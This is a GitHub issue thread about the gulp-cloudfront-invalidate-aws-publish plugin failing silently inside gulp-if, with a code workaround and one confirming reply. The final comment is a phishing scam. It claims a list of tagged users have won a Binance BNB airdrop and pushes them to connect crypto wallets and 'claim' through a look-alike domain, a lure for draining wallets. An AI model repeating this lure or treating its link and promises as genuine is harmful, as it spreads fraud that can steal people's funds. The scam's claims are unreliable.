### ISSUE TITLE
doesn't work with gulp-if

### ISSUE THREAD

**Issue by MichaelJCole** [lpender/gulp-cloudfront-invalidate-aws-publish#20]
This took a bit to track down.  This doesn't work with gulp-if.

```
gulp.task('deploy', function() {

  // create a new publisher using S3 options
  // http://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/S3.html#constructor-property
  var publisher = awspublish.create(config, config);

  var g = gulp.src('./' + config.distDir + '/**')
    // publisher will add Content-Length, Content-Type and headers specified above
    // If not specified it will set x-amz-acl to public-read by default
    .pipe(parallelize(publisher.publish(config.headers), config.concurrentUploads))
    // Invalidate CDN
    .pipe(gulpif(config.distribution, cloudfront(config))) // <---- This doesn't work or print errors
    // Delete removed files
    .pipe(publisher.sync())
    // create a cache file to speed up consecutive uploads
    .pipe(publisher.cache())
     // print upload updates to console
    .pipe(awspublish.reporter());
});
```

Workaround:

```

gulp.task('deploy', function() {

  // create a new publisher using S3 options
  // http://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/S3.html#constructor-property
  var publisher = awspublish.create(config, config);

  var g = gulp.src('./' + config.distDir + '/**')
  // publisher will add Content-Length, Content-Type and headers specified above
  // If not specified it will set x-amz-acl to public-read by default
  .pipe(parallelize(publisher.publish(config.headers), config.concurrentUploads))

  // Invalidate CDN
  if (config.distribution) g.pipe(cloudfront(config));

  // Delete removed files
  g.pipe(publisher.sync())
  // create a cache file to speed up consecutive uploads
  .pipe(publisher.cache())
   // print upload updates to console
  .pipe(awspublish.reporter());
});

```

**Comment by blaues0cke** [comment]
Can confirm this, it just does nothing in combination with `gulp-if`. Thanks for the workaround!

**Comment by Shivanisb97** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Mziserman, @ElDraque3009, @imestin, @bgbrthrs, @r44cx, @opendomain, @shawndouglass, @ghawthorne66, @BrainOnBread, @cryptotavares, @smile921, @benvizy, @RV12R, @sonatard, @hackerphysics, @ijero, @geeknees, @belitis99, @merc1er, @huangxiaojieCoder, @michaelshapkin, @burakbalta, @gsolomin, @besquared, @ngxiaoyi, @springmaple, @callieapan, @1969IGOR, @gustavz, @D-lyw, @svengreb, @Pavlina22, @hippopub, @podiumdesu, @mehmetboraezer, @scwp, @itenev, @mratsim, @jxsmallmouse, @ramonfounder, @vyorkin, @oaoit, @wpank, @wuzhuzhu, @yadihaoku, @thebor1337, @grachyov, @massun-onibakuchi, @Kajlich, @liushmh
